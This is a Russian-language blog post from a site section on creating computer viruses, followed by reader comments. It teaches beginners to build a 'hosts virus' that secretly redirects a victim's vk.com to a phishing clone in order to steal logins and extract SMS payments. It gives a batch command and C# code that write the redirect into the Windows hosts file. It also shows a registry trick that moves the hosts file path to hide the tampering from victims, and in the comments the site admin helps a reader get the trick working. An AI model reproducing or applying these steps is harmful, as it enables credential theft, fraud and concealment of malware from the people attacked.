Главная » Создание компьютерных вирусов

Вирус для файла Hosts

вирус для hosts

Как незаметно перевести пользователя на копию социальной сети

Я уже писал про, как хакеры перенаправляют пользователей вместо их любимых социальных сетей на свои сайты, дизайн которых полностью копирует дизайн социальной сети. Пользователь не замечает разницы и с удовольствием вводит свои учетные данные. А после того, как страничка говорит, что пользователь ввел неправильные идентификационные данные, просит отправить sms-сообщение для восстановления доступа. Тут то и наивный пользователь может отправить, кроме уже отправленных связки логин и пароль, и свои деньги злоумышленнику. Приятного тут мало. О том, как избавиться от такой проблемы, я писал в статье «Вконтакте просит отправить sms-сообщение, чтобы зайти на страницу. Что делать?». Ну, а задача данной статьи абсолютно обратная. Тут мы поможем начинающим хакером создать вирус для файла Hosts, назовем его так.

Вирус для Hosts

Что нужно делать, думаю, предельно ясно. Если нет, перечитайте предыдущую статью еще раз. А вдобавок можете подробнее узнать про файл Hosts. Но всё же я объясню еще раз: нам нужно изменить файл Hosts таким образом, чтобы при открытии какой-либо социальной сети или любого другого ресурса, пользователь оказывался на Вашем сайте, который в плане дизайна является полной копией оригинала. Для этого нам нужен сайт, который полностью идентичен странице авторизации выбранной социальной и его адрес в сети(IP-адрес). Всё это Вы должны сделать сами, я не буду рассматривать процесс создания такой страницы. Когда у Вас будет сайт с дизайном как у социальной сети и необходимым для Вас функционалом, тогда остается на компьютере жертвы изменить, а точнее добавить одну единственную строчку вида:

172.254.13.72 vk.com

Представленный в примере IP-адрес должен быть заменен на тот, по которому находится Ваш сайт-клон. На этом с теорией мы разобрались, далее я предложу код, который необходим для Hosts вируса, то есть для вируса, который на целевом компьютере незаметно для пользователя изменит содержимое файла Hosts.

Изменение файла hosts

Изменить файл Hosts вручную не составляет большого труда. Нужно всего лишь открыть нужную папку и найти файл, полный путь к которому выглядит следующим образом:

C:\Windows\System32\drivers\etc\hosts

После чего открыть его с помощью любого текстового редактора(отлично для этих целей подойдет и обычный Блокнот) и внести необходимые изменения. Но так как изменение данного файла интересует нас со стороны черного хакера, то посмотрим как можно изменить содержимое файла Hosts программно. Ниже я представлю несколько вариантов решения этой задачи.

Изменение файла Hosts через командную строку

Мы уже рассматривали процесс создания bat-вирусов, поэтому представлю необходимую команду, которую нужно выполнить в окне командной строки, чтобы изменить файл Hosts нужным нам образом. Добавление новой строки в hosts через командную строку дело несложное, Вам лишь нужно выполнить следующую команду:

echo 172.254.13.72 vk.com>c:\windows\system32\drivers\etc\hosts

В статье про создание bat-вирусов я уже подробно рассматривал подобные команды, но все же повторюсь еще раз: команда echo выводит сообщение, которое идет после него, а знак

>

показывает куда необходимо вывести это сообщение. Всё довольно просто: данная команда выводит вышеуказанную надпись в файл Hosts.

Изменение файла Hosts в C#

Реализация добавления строки в конец файла Hosts на языке программирования C# идентична любому другому аналогичному процессу с любым другим файлом. Вам нужно будет подключить директиву

System.IO

и выполнить три строчки кода:

StreamWriter sw = new StreamWriter(@"c:\windows\system32\drivers\etc\hosts",true);
sw.WriteLine("172.254.13.72 vk.com");
sw.Close();

Это всё, что должен выполнить наш Hosts вирус, чтобы незаметно перенаправить пользователя совсем на другой сайт.

Защищаем Hosts вирус

Статей про то, как можно вылечить компьютер после атаки Hosts вируса, целая куча. Взять хотя бы этот сайт — тут тоже было предложено несколько вариантов решения данной проблемы(приводил ссылки выше). Я это к тому, что человеку, встретившемуся с данным вирусом, будет несложно почистить файл hosts от всего лишнего — обучающего материала хоть завались, взять бы хотя бы мою статью про то, каким должен выглядеть оригинальный файл hosts. Все потерпевшие пользователи сразу же полезут в папку

C:\Windows\System32\Drivers\etc

найдут файл Hosts и будут скрупулезно чистить его. А что будет, если файл Hosts будет чист, но социальная сеть по-прежнему будет просить отправить сообщение? Абсолютно все ресурсы, которые попались на моём пути, указывают, что файл Hosts находится в папке

C:\Windows\System32\Drivers\etc

И они правы. Данная папка — место по умолчанию для данного файла. Именно тут и ищет его система. Но место, в котором система будет искать данный файл можно изменить. Для этого, нужно подправить параметр Реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\DataBasePath

который по умолчанию имеет значение

%SystemRoot%\System32\drivers\etc

Если данный путь изменить на какой-нибудь другой и именно туда запихнуть зараженный файл Hosts, то результат окажется положительным. Положительным для хакера. Ну а пользователь будет по старинке тыкаться в файл Hosts, который лежит в папке

C:\Windows\System32\drivers\etc

и который хакер может любезно привести в вид по умолчанию(так же приводил ссылку выше), чтобы пользователь не заметил никаких подвохов. Таким образом Вы сможете почти что на 100 процентов обезопасить свой зараженный вирусом файл Hosts. А так как информации про то, что местообитание файла Hosts можно с легкостью изменить, не слишком много, то и исправить последствия такого Hosts вируса будет сложно. Но сразу же хотелось успокоить тех пользователей, которые возможно захотели обругать автора за такую информацию: данная информация полезна и для мирных пользователей, которые так же могут спокойно упрятать файл Hosts с глаз долой, с души вон. И тогда многие хакерские вирусы будут изменять самый обычный файл, который никакого влияния на систему не имеет. Так что везде нужно искать плюсы. Удачи Всем.

4 комментариев к записи “Вирус для файла Hosts
  1. Игорь в cказал :

    Создал новую папку: %SystemRoot%\System32\drivers\temp
    Скопировал в нее оригинальный hosts. C правами админа прописал в нем нужные мне редиректы. Изменил путь к файлу hosts в реестре на указанный выше. Сохранил изменения параметра. Редиректы не работают! В чем проблема. Если Вы глубоко в теме, объясните.

    • admin в cказал :

      Ну первое что в голову приходит, это попробовать перезагрузить компьютер, чтобы правки вступили в силу. Плюс могу предложит попробовать с другого браузера или с режима инкогнито, возможно используется кэш dns.

  2. Alexey в cказал :

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\DataBasePath у меня нет такой ветки DataBasePath

    • admin в cказал :

      Создайте недостающие разделы.

Добавить комментарий

Ваш комментарий появится после модерации.